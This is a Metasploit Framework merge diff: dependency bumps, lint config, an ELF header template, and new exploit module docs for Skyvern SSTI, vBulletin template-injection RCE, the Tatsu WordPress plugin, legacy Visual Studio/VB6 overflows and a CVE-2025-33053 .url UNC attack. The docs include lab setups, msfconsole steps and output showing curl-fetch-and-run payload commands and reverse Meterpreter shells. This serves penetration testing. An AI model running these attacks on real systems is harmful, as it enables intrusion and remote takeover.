Merge pull request #20360 from adfoster-r7/add-syslog-to-gemspec

Add syslog to gemspec
2025-06-29 17:40:40 +01:00 · 2025-06-29 15:57:53 +01:00 · 2025-06-29 14:45:21 +00:00 · 2025-06-29 13:44:28 +01:00 · 2025-06-29 01:05:42 +01:00 · 2025-06-27 11:26:09 -04:00
2565 changed files with 131417 additions and 96835 deletions
@@ -23,6 +23,7 @@ require:
  - ./lib/rubocop/cop/lint/deprecated_gem_version.rb
  - ./lib/rubocop/cop/lint/module_enforce_notes.rb
  - ./lib/rubocop/cop/lint/detect_invalid_pack_directives.rb
+  - ./lib/rubocop/cop/lint/detect_metadata_trailing_leading_whitespace.rb

 Layout/SpaceBeforeBrackets:
  Enabled: true
@@ -113,6 +114,12 @@ Style/DocumentDynamicEvalDefinition:
 Style/EndlessMethod:
  Enabled: true

+Style/FormatStringToken:
+  Enabled: true
+  Exclude:
+  # We aren't ready to enable this for modules yet
+    - 'modules/**/*'
+
 Style/HashExcept:
  Enabled: true

@@ -666,3 +673,6 @@ Style/UnpackFirst:
    Disabling to make it easier to copy/paste `unpack('h*')` expressions from code
    into a debugging REPL.
  Enabled: false
+
+Lint/DetectMetadataTrailingLeadingWhitespace:
+  Enabled: true
@@ -1,7 +1,7 @@
 PATH
  remote: .
  specs:
-    metasploit-framework (6.4.69)
+    metasploit-framework (6.4.72)
      aarch64
      abbrev
      actionpack (~> 7.1.0)
@@ -47,7 +47,7 @@ PATH
      metasploit-model
      metasploit-payloads (= 2.0.221)
      metasploit_data_models (>= 6.0.7)
-      metasploit_payloads-mettle (= 1.0.35)
+      metasploit_payloads-mettle (= 1.0.42)
      mqtt
      msgpack (~> 1.6.0)
      mutex_m
@@ -104,6 +104,7 @@ PATH
      sqlite3 (= 1.7.3)
      sshkey
      swagger-blocks
+      syslog
      thin
      tzinfo
      tzinfo-data
@@ -339,7 +340,7 @@ GEM
      railties (~> 7.0)
      recog
      webrick
-    metasploit_payloads-mettle (1.0.35)
+    metasploit_payloads-mettle (1.0.42)
    method_source (1.1.0)
    mime-types (3.6.0)
      logger
@@ -572,6 +573,8 @@ GEM
    sshkey (3.0.0)
    strptime (0.2.5)
    swagger-blocks (3.0.0)
+    syslog (0.3.0)
+      logger
    test-prof (1.4.4)
    thin (1.8.2)
      daemons (~> 1.0, >= 1.0.9)
@@ -93,11 +93,11 @@ memory_profiler, 1.1.0, MIT
 metasm, 1.0.5, LGPL-2.1
 metasploit-concern, 5.0.4, "New BSD"
 metasploit-credential, 6.0.16, "New BSD"
-metasploit-framework, 6.4.69, "New BSD"
+metasploit-framework, 6.4.72, "New BSD"
 metasploit-model, 5.0.3, "New BSD"
 metasploit-payloads, 2.0.221, "3-clause (or ""modified"") BSD"
 metasploit_data_models, 6.0.9, "New BSD"
-metasploit_payloads-mettle, 1.0.35, "3-clause (or ""modified"") BSD"
+metasploit_payloads-mettle, 1.0.42, "3-clause (or ""modified"") BSD"
 method_source, 1.1.0, MIT
 mime-types, 3.6.0, MIT
 mime-types-data, 3.2025.0304, MIT
@@ -165,7 +165,7 @@ rex-mime, 0.1.11, "New BSD"
 rex-nop, 0.1.4, "New BSD"
 rex-ole, 0.1.9, "New BSD"
 rex-powershell, 0.1.101, "New BSD"
-rex-random_identifier, 0.1.15, "New BSD"
+rex-random_identifier, 0.1.16, "New BSD"
 rex-registry, 0.1.6, "New BSD"
 rex-rop_builder, 0.1.6, "New BSD"
 rex-socket, 0.1.62, "New BSD"
@@ -67,6 +67,8 @@
 <% description = "Module may cause a noise (Examples: audio output from the speakers or hardware beeps)." %>
 <% elsif side_effect == "physical-effects" %>
 <% description = "Module may produce physical effects (Examples: the device makes movement or flashes LEDs)." %>
+<% elsif side_effect == "unknown-side-effects" %>
+<% description = "Module side effects are unknown." %>
 <% end %>

 * **<%= side_effect %>:** <%= description %>
@@ -85,6 +87,8 @@
 <% description = "The module isn't expected to get a shell reliably (such as only once)." %>
 <% elsif reliability == "event-dependent" %>
 <% description = "The module may not execute the payload until an external event occurs. For instance, a cron job, machine restart, user interaction within a GUI element, etc." %>
+<% elsif reliability == "unknown-reliability" %>
+<% description = "Module reliability is unknown." %>
 <% end %>

 * **<%= reliability %>:** <%= description %>
@@ -109,6 +113,8 @@
 <% description = "Module may cause a resource (such as a file or data in a database) to be unavailable for the service." %>
 <% elsif stability == "os-resource-loss" %>
 <% description = "Modules may cause a resource (such as a file) to be unavailable for the OS." %>
+<% elsif stability == "unknown-stability" %>
+<% description = "Module stability is unknown." %>
 <% end %>

 * **<%= stability %>:** <%= description %>
@@ -0,0 +1,35 @@
+BITS 64
+ehdr:                            ; Elf32_Ehdr
+  db    0x7F, "ELF", 2, 2, 1, 0  ;   e_ident
+  db    0, 0, 0, 0,  0, 0, 0, 0  ;
+  dw    0x0200                   ;   e_type       = ET_EXEC for an executable
+  dw    0x1500                   ;   e_machine    = PPC64
+  dd    0x01000000                        ;   e_version
+  dq    0x7810000000000000      ;   e_entry
+  dq    0x4000000000000000       ;   e_phoff
+  dq    0                        ;   e_shoff
+  dd    0                        ;   e_flags
+  dw    0x4000                   ;   e_ehsize
+  dw    0x3800                   ;   e_phentsize
+  dw    0x0100                   ;   e_phnum
+  dw    0                        ;   e_shentsize
+  dw    0                        ;   e_shnum
+  dw    0                        ;   e_shstrndx
+
+ehdrsize equ  $ - ehdr
+
+phdr:                            ; Elf32_Phdr
+
+  dd    0x01000000               ;   p_type       = pt_load
+  dd    0x07000000               ;   p_flags      = rwx
+  dq    0                        ;   p_offset
+  dq    0x0010000000000000       ;   p_vaddr
+  dq    0x0010000000000000                       ;   p_paddr
+  dq    0xefbeadde       ;   p_filesz
+  dq    0xefbeadde       ;   p_memsz
+  dq    0x0000100000000000      ;   p_align
+
+phdrsize equ  $ - phdr
+
+_start:
+dq      0x8010000000000000
@@ -46,6 +46,7 @@ slideshow-gallery
 sp-client-document-manager
 subscribe-to-comments
 suretriggers
+tatsu
 ultimate-member
 user-registration
 user-registration-pro
@@ -0,0 +1,221 @@
+## Vulnerable Application
+
+Skyvern is browser-based automation tool integrated with AI and LLMs.
+It allows to create workflows, which can perform automation tasks based on LLMs.
+Version up to 0.1.84 is vulnerable to SSTI, which can lead to remote code execution.
+The application is available [here](https://github.com/Skyvern-AI/skyvern.git).
+
+### Installation
+
+1. `git clone https://github.com/Skyvern-AI/skyvern.git`
+2. `cd skyvern`
+3. `mv .env.example .env`
+4. `mv skyvern-frontend/.env.example skyvern-frontend/.env`
+5. Override the content of `docker-compose.yml` with the following configuration:
+```yaml
+services:
+  postgres:
+    image: postgres:14-alpine
+    restart: always
+    # comment out if you want to externally connect DB
+    ports:
+      - 5432:5432
+    volumes:
+      - ./postgres-data:/var/lib/postgresql/data
+    environment:
+      - PGDATA=/var/lib/postgresql/data/pgdata
+      - POSTGRES_USER=skyvern
+      - POSTGRES_PASSWORD=skyvern
+      - POSTGRES_DB=skyvern
+    healthcheck:
+      test: ["CMD-SHELL", "pg_isready -U skyvern"]
+      interval: 5s
+      timeout: 5s
+      retries: 5
+  skyvern:
+    image: public.ecr.aws/skyvern/skyvern:v0.1.84
+    restart: on-failure
+    env_file:
+      - .env
+    # comment out if you want to externally call skyvern API
+    ports:
+      - 8000:8000
+      - 9222:9222 # for cdp browser forwarding
+    volumes:
+      - ./artifacts:/data/artifacts
+      - ./videos:/data/videos
+      - ./har:/data/har
+      - ./log:/data/log
+      - ./.streamlit:/app/.streamlit
+      # Uncomment the following two lines if you want to connect to any local changes
+      # - ./skyvern:/app/skyvern
+      # - ./alembic:/app/alembic
+    environment:
+      - DATABASE_STRING=postgresql+psycopg://skyvern:skyvern@postgres:5432/skyvern
+      - BROWSER_TYPE=chromium-headful
+      - ENABLE_CODE_BLOCK=true
+      # - BROWSER_TYPE=cdp-connect
+      # Use this command to start Chrome with remote debugging:
+      # "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --user-data-dir="C:\chrome-cdp-profile" --no-first-run --no-default-browser-check
+      # /Applications/Google\ Chrome.app/Contents/MacOS/Google\ Chrome --remote-debugging-port=9222 --user-data-dir="/Users/yourusername/chrome-cdp-profile" --no-first-run --no-default-browser-check
+      # - BROWSER_REMOTE_DEBUGGING_URL=http://host.docker.internal:9222/
+    # =========================
+    #       LLM Settings - Recommended to use skyvern CLI, `skyvern init llm` to setup your LLM's
+    # =========================
+    # OpenAI Support:
+    # If you want to use OpenAI as your LLM provider, uncomment the following lines and fill in your OpenAI API key.
+    # - ENABLE_OPENAI=true
+    # - LLM_KEY=OPENAI_GPT4O
+    # - OPENAI_API_KEY=<your_openai_key>
+    #  Gemini Support:
+    # Gemini is a new LLM provider that is currently in beta. You can use it by uncommenting the following lines and filling in your Gemini API key.
+    # - LLM_KEY=GEMINI
+    # - ENABLE_GEMINI=true
+    # - GEMINI_API_KEY=YOUR_GEMINI_KEY
+    # - LLM_KEY=GEMINI_2.5_PRO_PREVIEW_03_25
+    # If you want to use other LLM provider, like azure and anthropic:
+    # - ENABLE_ANTHROPIC=true
+    # - LLM_KEY=ANTHROPIC_CLAUDE3.5_SONNET
+    # - ANTHROPIC_API_KEY=<your_anthropic_key>
+    # Microsoft Azure OpenAI support:
+    # If you'd like to use Microsoft Azure OpenAI as your managed LLM service integration with Skyvern, use the environment variables below.
+    # In your Microsoft Azure subscription, you will need to provision the OpenAI service and deploy a model, in order to utilize it.
+    # 1. Login to the Azure Portal
+    # 2. Create an Azure Resource Group
+    # 3. Create an OpenAI resource in the Resource Group (choose a region and pricing tier)
+    # 4. From the OpenAI resource's Overview page, open the "Azure AI Foundry" portal (click the "Explore Azure AI Foundry Portal" button)
+    # 5. In Azure AI Foundry, click "Shared Resources" --> "Deployments"
+    # 6. Click "Deploy Model" --> "Deploy Base Model" --> select a model (specify this model "Deployment Name" value for the AZURE_DEPLOYMENT variable below)
+    # - ENABLE_AZURE=true
+    # - LLM_KEY=AZURE_OPENAI                          # Leave this value static, don't change it
+    # - AZURE_DEPLOYMENT=<your_azure_deployment>      # Use the OpenAI model "Deployment Name" that you deployed, using the steps above
+    # - AZURE_API_KEY=<your_azure_api_key>            # Copy and paste Key1 or Key2 from the OpenAI resource in Azure Portal
+    # - AZURE_API_BASE=<your_azure_api_base>          # Copy and paste the "Endpoint" from the OpenAI resource in Azure Portal (eg. https://xyzxyzxyz.openai.azure.com/)
+    # - AZURE_API_VERSION=<your_azure_api_version>    # Specify a valid Azure OpenAI data-plane API version (eg. 2024-08-01-preview) Docs: https://learn.microsoft.com/en-us/azure/ai-services/openai/reference
+    # Amazon Bedrock Support:
+    # Amazon Bedrock is a managed service that enables you to invoke LLMs and bill them through your AWS account.
+    # To use Amazon Bedrock as the LLM provider for Skyvern, specify the following environment variables.
+    # 1. In the AWS IAM console, create a new AWS IAM User (name it whatever you want)
+    # 2. Assign the "AmazonBedrockFullAccess" policy to the user
+    # 3. Generate an IAM Access Key under the IAM User's Security Credentials tab
+    # 4. In the Amazon Bedrock console, go to "Model Access"
+    # 5. Click Modify Model Access button
+    # 6. Enable "Claude 3.5 Sonnet v2" and save changes
+    # - ENABLE_BEDROCK=true
+    # - LLM_KEY=BEDROCK_ANTHROPIC_CLAUDE3.5_SONNET   # This is the Claude 3.5 Sonnet "V2" model. Change to BEDROCK_ANTHROPIC_CLAUDE3.5_SONNET_V1 for the non-v2 version.
+    # - AWS_REGION=us-west-2                         # Replace this with a different AWS region, if you desire
+    # - AWS_ACCESS_KEY_ID=FILL_ME_IN_PLEASE
+    # - AWS_SECRET_ACCESS_KEY=FILL_ME_IN_PLEASE
+    # Ollama Support:
+    # Ollama is a local LLM provider that can be used to run models locally on your machine.
+    # - LLM_KEY=OLLAMA
+    # - ENABLE_OLLAMA=true
+    # - OLLAMA_MODEL=qwen2.5:7b-instruct
+    # - OLLAMA_SERVER_URL=http://host.docker.internal:11434
+    # Open Router Support:
+    # - ENABLE_OPENROUTER=true
+    # - LLM_KEY=OPENROUTER
+    # - OPENROUTER_API_KEY=<your_openrouter_api_key>
+    # - OPENROUTER_MODEL=mistralai/mistral-small-3.1-24b-instruct
+    # Groq Support:
+    # - ENABLE_GROQ=true
+    # - LLM_KEY=GROQ
+    # - GROQ_API_KEY=<your_groq_api_key>
+    # - GROQ_MODEL=llama-3.1-8b-instant
+
+    # Maximum tokens to use: (only set for OpenRouter aand Ollama)
+    # - LLM_CONFIG_MAX_TOKENS=128000
+
+    # Bitwarden Settings
+    # If you are looking to integrate Skyvern with a password manager (eg Bitwarden), you can use the following environment variables.
+    # - BITWARDEN_SERVER=http://localhost  # OPTIONAL IF YOU ARE SELF HOSTING BITWARDEN
+    # - BITWARDEN_SERVER_PORT=8002 # OPTIONAL IF YOU ARE SELF HOSTING BITWARDEN
+    # - BITWARDEN_CLIENT_ID=FILL_ME_IN_PLEASE
+    # - BITWARDEN_CLIENT_SECRET=FILL_ME_IN_PLEASE
+    # - BITWARDEN_MASTER_PASSWORD=FILL_ME_IN_PLEASE
+
+    # 1Password Integration
+    # If you are looking to integrate Skyvern with 1Password, you can use the following environment variables.
+    # OP_SERVICE_ACCOUNT_TOKEN=""
+    depends_on:
+      postgres:
+        condition: service_healthy
+    healthcheck:
+      test: ["CMD", "test", "-f", "/app/.streamlit/secrets.toml"]
+      interval: 5s
+      timeout: 5s
+      retries: 5
+  skyvern-ui:
+    image: public.ecr.aws/skyvern/skyvern-ui:latest
+    restart: on-failure
+    ports:
+      - 8080:8080
+      - 9090:9090
+    volumes:
+      - ./artifacts:/data/artifacts
+      - ./videos:/data/videos
+      - ./har:/data/har
+      - ./.streamlit:/app/.streamlit
+    env_file:
+      - skyvern-frontend/.env
+    environment: {}
+    #  - VITE_ENABLE_CODE_BLOCK=true
+    # if you want to run skyvern on a remote server,
+    # you need to change the host in VITE_WSS_BASE_URL and VITE_API_BASE_URL to match your server ip
+    # If you're self-hosting this behind a dns, you'll want to set:
+    #   A route for the API: api.yourdomain.com -> localhost:8000
+    #   A route for the UI: yourdomain.com -> localhost:8080
+    #   A route for the artifact API: artifact.yourdomain.com -> localhost:9090 (maybe not needed)
+    # - VITE_WSS_BASE_URL=ws://localhost:8000/api/v1
+    #   - VITE_ARTIFACT_API_BASE_URL=http://localhost:9090
+    #   - VITE_API_BASE_URL=http://localhost:8000/api/v1
+    #   - VITE_SKYVERN_API_KEY=<get this from "settings" in the Skyvern UI>
+    depends_on:
+      skyvern:
+        condition: service_healthy
+```
+6. `docker-compose up`
+
+
+## Verification Steps
+
+1. Install the application
+2. Start msfconsole
+3. Do: `use linux/http/skyvern_ssti_cve_2025_49619`
+4. Set `rhost`,`rport`, `lhost`, `lport`
+5. Do: `set API_KEY [skyvern API key]`
+6. Do: `run`
+7. You should get a shell.
+
+## Options
+
+### API_KEY
+
+The Skyvern uses API key to access API and manage the application.
+It is necessary to view, create and modify workflows. It can be acquired from UI interface.
+
+## Scenarios
+
+Vulnerable version is <=0.1.84.
+
+```
+msf6 exploit(linux/http/skyvern_ssti_cve_2025_49619) > run verbose=true
+[*] Command to run on remote host: curl -so ./SFDHeJURLqF http://192.168.168.183:8080/YtbemzlkZg8l1wkKWmIdEg;chmod +x ./SFDHeJURLqF;./SFDHeJURLqF&
+[*] Fetch handler listening on 192.168.168.183:8080
+[*] HTTP server started
+[*] Adding resource /YtbemzlkZg8l1wkKWmIdEg
+[*] Started reverse TCP handler on 192.168.168.183:4444
+[*] Client 192.168.168.146 requested /YtbemzlkZg8l1wkKWmIdEg
+[*] Sending payload to 192.168.168.146 (curl/7.88.1)
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3045380 bytes) to 192.168.168.146
+[*] Meterpreter session 1 opened (192.168.168.183:4444 -> 192.168.168.146:48480) at 2025-06-23 10:04:13 +0200
+
+meterpreter > sysinfo
+Computer     : 172.18.0.3
+OS           : Debian 12.10 (Linux 6.8.0-52-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+
+```
@@ -0,0 +1,173 @@
+## Vulnerable Application
+
+This Metasploit module exploits a design flaw in vBulletin’s AJAX API handler and template
+rendering system, affecting **vBulletin 5.0.0 through 6.0.3** on **PHP 8.1+**.
+An unauthenticated attacker can invoke the protected `vB_Api_Ad::replaceAdTemplate()` method to inject a malicious template that calls
+`"system"("base64_decode"($_POST[<param>]))`, then trigger execution via the `ajax/render/ad_<location>` endpoint,
+yielding arbitrary code execution as the webserver user.
+
+> **Note:** vBulletin is commercial software and is **not** included here. You must obtain a licensed copy and extract it under `./upload/`.
+
+---
+
+## To replicate vulnerable environments
+
+1. **vBulletin 6.0.1 (tested)**
+
+   * Purchase and download vBulletin 6.0.1 from the official portal.
+   * Extract all files into `./upload/`.
+
+2. **Other versions (5.0.0–6.0.3)**
+
+   * Repeat the above with any of the supported versions.
+   * Ensure you run on PHP 8.1+; earlier PHP versions do not expose this flaw.
+
+---
+
+## Docker Compose Configuration
+
+```yaml
+services:
+  db:
+    image: mysql:5.7
+    container_name: vbulletin_db
+    restart: unless-stopped
+    environment:
+      MYSQL_ROOT_PASSWORD: root_password_here
+      MYSQL_DATABASE: vbulletin
+      MYSQL_USER: vbulletin
+      MYSQL_PASSWORD: vb_password_here
+    volumes:
+      - db_data:/var/lib/mysql
+
+  web:
+    build: .
+    container_name: vbulletin_web
+    depends_on: [db]
+    ports: ["8888:80"]
+    environment:
+      VB_DB_HOST: db
+      VB_DB_NAME: vbulletin
+      VB_DB_USER: vbulletin
+      VB_DB_PASS: vb_password_here
+
+volumes:
+  db_data:
+```
+
+Create the following **Dockerfile** and **docker-entrypoint.sh** in the same directory:
+
+**Dockerfile**
+
+```dockerfile
+FROM php:8.1-apache
+
+COPY upload/ /var/www/html/
+
+RUN apt-get update && \
+    apt-get install -y --no-install-recommends \
+       libzip-dev zlib1g-dev libonig-dev \
+       libpng-dev libjpeg-dev libfreetype6-dev && \
+    docker-php-ext-install \
+       zip mysqli pdo_mysql gd mbstring && \
+    a2enmod rewrite && \
+    rm -rf /var/lib/apt/lists/*
+
+RUN echo "phar.readonly=Off" > /usr/local/etc/php/conf.d/vbulletin.ini
+
+COPY --chmod 755 docker-entrypoint.sh /usr/local/bin/
+ENTRYPOINT ["docker-entrypoint.sh"]
+CMD ["apache2-foreground"]
+```
+
+**docker-entrypoint.sh**
+
+```bash
+#!/bin/bash
+chown -R www-data:www-data /var/www/html
+exec "$@"
+```
+
+---
+
+## Verification Steps
+
+1. **Start the environment**
+```bash
+docker-compose up -d
+```
+
+2. **Install vBulletin**
+Open [http://localhost:8888](http://localhost:8888) and complete the installation:
+
+* **Database Host:** db
+* **DB Name:** vbulletin
+* **DB User:** vbulletin
+* **DB Password:** vb_password_here
+
+3. **Run `msfconsole`**
+
+```bash
+use exploit/multi/http/vbulletin_replace_ad_template_rce
+set RHOSTS 127.0.0.1
+set RPORT 8888
+set TARGETURI /
+check
+```
+
+---
+
+## Options
+
+No option
+
+---
+
+## Scenarios
+
+### Unauthenticated Pre-Auth RCE
+
+1. Ensure vBulletin 5.0.0–6.0.3 is installed and running on PHP 8.1+.
+2. In `msfconsole`, configure and run:
+
+```bash
+set RHOSTS localhost
+set RPORT 8888
+set TARGETURI /
+```
+
+---
+
+## Expected Results
+
+### With `cmd/linux/http/x64/meterpreter/reverse_tcp`
+
+```plaintext
+msf6 exploit(multi/http/vbulletin_replace_ad_template_rce) > run http://lab:8888
+[*] Command to run on remote host: curl -so ./BGZuzbsi http://192.168.1.36:8080/LoPlnjEpeOexZNVppn6cAA;chmod +x ./BGZuzbsi;./BGZuzbsi&
+[*] Fetch handler listening on 192.168.1.36:8080
+[*] HTTP server started
+[*] Adding resource /LoPlnjEpeOexZNVppn6cAA
+[*] Started reverse TCP handler on 192.168.1.36:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Starting vulnerability check on 127.0.0.1:8888/
+[*] Generating random marker and condition for mode check
+[*] Sending POST to ajax/api/ad/replaceAdTemplate (location=QuFcp)
+[*] Injection response: HTTP 200
+[+] Marker found in injection response body
+[+] The target is vulnerable.
+[*] Generating random marker and condition for mode exploit
+[*] Sending POST to ajax/api/ad/replaceAdTemplate (location=XSGFS)
+[*] Client 172.28.0.3 requested /LoPlnjEpeOexZNVppn6cAA
+[*] Sending payload to 172.28.0.3 (curl/7.88.1)
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3045380 bytes) to 172.28.0.3
+[*] Meterpreter session 8 opened (192.168.1.36:4444 -> 172.28.0.3:53014) at 2025-05-29 16:27:00 +0200
+
+meterpreter > sysinfo
+Computer     : 172.28.0.3
+OS           : Debian 12.11 (Linux 6.14.8-2-cachyos)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+```
@@ -0,0 +1,76 @@
+## Vulnerable Application
+
+This module exploits unauthenticated remote code execution in Tatsu plugin for Wordpress. The vulnerable version is below 3.3.11.
+The module upload malicious zip file containing PHP payload, which gets parsed and unzipped into Wordpress upload directory.
+Then module will trigger the payload by sending request with payload directory as URI.
+The vulnerable plugin is available [here](https://tatsubuilder.com/wp-content/uploads/edd/2022/03/tatsu-3.3.11.zip)
+
+## Verification Steps
+
+
+1. Install the application
+1.1 Create `docker-compose.yml`
+```yaml
+services:
+
+  wordpress:
+    image: wordpress:6.3.2
+    restart: always
+    ports:
+      - 5555:80
+    environment:
+      WORDPRESS_DB_HOST: db
+      WORDPRESS_DB_USER: ms
+      WORDPRESS_DB_PASSWORD: supersecret
+      WORDPRESS_DB_NAME: proof_of_concept
+    volumes:
+      - wordpress:/var/www/html
+      - ./custom.ini:/usr/local/etc/php/conf.d/custom.ini
+
+  db:
+    image: mysql:5.7
+    restart: always
+    environment:
+      MYSQL_DATABASE: proof_of_concept
+      MYSQL_USER: ms
+      MYSQL_PASSWORD: supersecret
+      MYSQL_ROOT_PASSWORD: supersecret
+    volumes:
+      - db:/var/lib/mysql
+
+volumes:
+  wordpress:
+  db:
+
+```
+1.2 Download [plugin](https://tatsubuilder.com/wp-content/uploads/edd/2022/03/tatsu-3.3.11.zip)
+1.3 Install the plugin in Wordpress admin portal
+
+2. `msfconsole`
+3. `use multi/http/wp_tatsu_rce`
+4. `set RHOST [target IP]`
+5. `set RPORT [target PORT]`
+6. `set LHOST [attacker's IP]`
+7. `set LPORT [attacker's port]`
+
+## Options
+
+
+## Scenarios
+
+
+Vulnerable version is <= 3.3.11.
+
+```
+`msf6 exploit(multi/http/wp_tatsu_rce) > run
+[*] Started reverse TCP handler on 192.168.168.128:4444 
+[*] Sending stage (40004 bytes) to 172.18.0.2
+[*] Meterpreter session 2 opened (192.168.168.128:4444 -> 172.18.0.2:37718) at 2025-06-11 18:59:35 +0200
+[*] Starting interaction with 2...
+
+meterpreter > sysinfo
+Computer    : ff0d55ec29bf
+OS          : Linux ff0d55ec29bf 6.12.10-76061203-generic #202412060638~1748542656~22.04~663e4dc SMP PREEMPT_DYNAMIC Thu M x86_64
+Meterpreter : php/linux
+meterpreter > 
+```
@@ -0,0 +1,52 @@
+## Vulnerable Application
+
+This module exploits a stack buffer overflow in Microsoft Visual
+Studio 6.0. When passing a specially crafted string to the Mask
+parameter of the Mdmask32.ocx ActiveX Control, an attacker may
+be able to execute arbitrary code.
+
+
+## Verification Steps
+
+1. Start msfconsole
+1. Do: `use exploit/windows/browser/ms08_070_visual_studio_msmask`
+1. Do: `set SRVHOST [host]`
+1. Do: `set SRVPORT [port]`
+1. Do: `set URIPATH [uri]`
+1. Do: `set PAYLOAD [payload]`
+1. Do: `run`
+1. Open the server URL on a vulnerable system
+
+
+## Options
+
+### URIPATH
+
+The server URI path to use. (default: `/`)
+
+
+## Scenarios
+
+### Windows XP SP3 (x86) (English)
+
+```
+msf6 > use exploit/windows/browser/ms08_070_visual_studio_msmask
+[*] Using configured payload windows/shell/reverse_tcp
+msf6 exploit(windows/browser/ms08_070_visual_studio_msmask) > set srvhost 0.0.0.0
+srvhost => 0.0.0.0
+msf6 exploit(windows/browser/ms08_070_visual_studio_msmask) > set srvport 8080
+srvport => 8080
+msf6 exploit(windows/browser/ms08_070_visual_studio_msmask) > set lhost 192.168.200.130 
+lhost => 192.168.200.130
+msf6 exploit(windows/browser/ms08_070_visual_studio_msmask) > run
+[*] Exploit running as background job 0.
+[*] Exploit completed, but no session was created.
+
+[*] Started reverse TCP handler on 192.168.200.130:4444 
+[*] Using URL: http://192.168.200.130:8080/
+[*] Server started.
+msf6 exploit(windows/browser/ms08_070_visual_studio_msmask) > 
+[*] 192.168.200.173  ms08_070_visual_studio_msmask - Sending Microsoft Visual Studio Mdmask32.ocx ActiveX Stack Buffer Overflow
+[*] Sending stage (240 bytes) to 192.168.200.173
+[*] Command shell session 1 opened (192.168.200.130:4444 -> 192.168.200.173:1052) at 2025-06-22 03:01:18 -0400
+```
@@ -0,0 +1,87 @@
+## Vulnerable Application
+
+This module exploits a stack buffer overflow in Microsoft Visual Basic
+6.0. A specially crafted Visual Basic Project (VBP) file containing
+a long reference line can be used to execute arbitrary code.
+
+This module has been tested successfully on:
+
+* Windows XP Home SP0 (x86) (English)
+* Windows XP Professional SP0 (x86) (English)
+* Windows XP Professional SP1 (x86-64) (English)
+* Windows XP Professional SP2 (x86-64) (English)
+* Windows XP Professional SP3 (x86) (English)
+
+## Verification Steps
+
+1. Start msfconsole
+1. Do: `use exploit/windows/fileformat/ms_visual_basic_vbp`
+1. Do: `set filename [filename.vbp]`
+1. Do: `set lhost [lhost]`
+1. Do: `set lport [lport]`
+1. Do: `set payload windows/shell/reverse_tcp`
+1. Do: `run`
+1. Do: `use exploit/multi/handler`
+1. Do: `set lhost [lhost]`
+1. Do: `set lport [lport]`
+1. Do: `set payload windows/shell/reverse_tcp`
+1. Do: `run -jz`
+1. Open `/home/user/.msf4/local/msf.vbp` on a vulnerable system
+
+## Options
+
+### FILENAME
+
+The project file name. (Default: `msf.vbp`).
+
+## Scenarios
+
+### Windows XP SP3 (x86) (English)
+
+```
+msf6 > use exploit/windows/fileformat/ms_visual_basic_vbp
+[*] Using configured payload windows/shell/reverse_tcp
+msf6 exploit(windows/fileformat/ms_visual_basic_vbp) > set lhost 192.168.200.130 
+lhost => 192.168.200.130
+msf6 exploit(windows/fileformat/ms_visual_basic_vbp) > show targets
+
+Exploit targets:
+=================
+
+    Id  Name
+    --  ----
+=>  0   Windows XP SP0-SP3 (x86) (English)
+    1   Windows XP SP1-SP2 (x86-64) (English)
+
+
+msf6 exploit(windows/fileformat/ms_visual_basic_vbp) > run
+[*] Creating 'msf.vbp' file for Windows XP SP0-SP3 (x86) (English) ...
+[+] msf.vbp stored at /home/user/.msf4/local/msf.vbp
+msf6 exploit(windows/fileformat/ms_visual_basic_vbp) > use exploit/multi/handler
+[*] Using configured payload generic/shell_reverse_tcp
+msf6 exploit(multi/handler) > set lhost 192.168.200.130
+lhost => 192.168.200.130
+msf6 exploit(multi/handler) > set payload windows/shell/reverse_tcp
+payload => windows/shell/reverse_tcp
+msf6 exploit(multi/handler) > run -jz
+[*] Exploit running as background job 0.
+[*] Exploit completed, but no session was created.
+
+[*] Started reverse TCP handler on 192.168.200.130:4444 
+msf6 exploit(multi/handler) > mv /home/user/.msf4/local/msf.vbp /var/www/html/msf.vbp
+[*] exec: mv /home/user/.msf4/local/msf.vbp /var/www/html/msf.vbp
+
+msf6 exploit(multi/handler) > 
+[*] Sending stage (240 bytes) to 192.168.200.173
+[*] Command shell session 1 opened (192.168.200.130:4444 -> 192.168.200.173:1037) at 2025-06-21 08:03:44 -0400
+
+msf6 exploit(multi/handler) > sessions -i 1
+[*] Starting interaction with 1...
+
+
+Shell Banner:
+Microsoft Windows XP [Version 5.1.2600]
+(C) Copyright 1985-2001 Microsoft Corp.
+
+C:\Documents and Settings\Administrator\Desktop>
+```
@@ -0,0 +1,104 @@
+## Vulnerable Application
+
+CVE-2025-33053 - Internet Shortcut (.url) UNC Path Exploit
+
+Windows improperly handles `.url` (Internet Shortcut) files referencing remote
+UNC paths. Specifically, `.url` files that specify a remote working directory
+(`WorkingDirectory=\\attacker\webdav`) and a trusted executable (e.g.,
+`iediagcmd.exe`) may cause the system to access the attacker's server when opened.
+
+This behavior can be exploited to:
+
+- Trigger NTLM authentication leaks (SMB relay)
+- Load remote payloads via WebDAV shares
+- Attempt DLL sideloading if conditions allow
+
+## Affected Versions
+
+- Windows 10 22H2
+- Windows 11 23H2
+- Fully patched prior to June 2025 Patch Tuesday
+
+## Verification Steps
+
+1. Run: `use windows/fileformat/unc_url_cve_2025_33053`
+2. Run: `set LHOST [IP address]`
+3. Run: `set SRVHOST [IP address]`
+4. Run: `run`
+5. Deliver the `.url` to the target (email, USB, zip)
+6. On victim's machine, open `.url`
+7. Payload execution
+
+### Overview
+
+This module generates a malicious `.url` Internet Shortcut file that abuses
+CVE-2025-33053 — a vulnerability in how Windows handles `.url` files referencing remote UNC
+paths.
+
+When opened on a vulnerable system, the `.url` causes the system to connect to a
+UNC path(e.g., a WebDAV or SMB share), triggering an attempt to execute a trusted binary
+from the attacker's location. This can result in RCE or credential leaks.
+
+
+## Options
+
+### OUTFILE
+This option allows user to define their own .url file. If this option is not set, the module will generate random .url file - `YWSXVjpW.url`.
+
+### FOLDER_NAME
+The `FOLDER_NAME` option defines SMB share folder, where the final payload file is stored. Generally can be anything, default is `webdav`.
+
+### FILE_NAME
+This option defines payload file stored in SMB share. This option should not change as it is bound to executable in `URL` parameter of `.url` file. The default value is `explorer.exe`.
+
+
+## Scenarios
+
+```
+msf6 exploit(windows/fileformat/unc_url_cve_2025_33053) > run verbose=true 
+[*] Exploit running as background job 2.
+[*] Exploit completed, but no session was created.
+
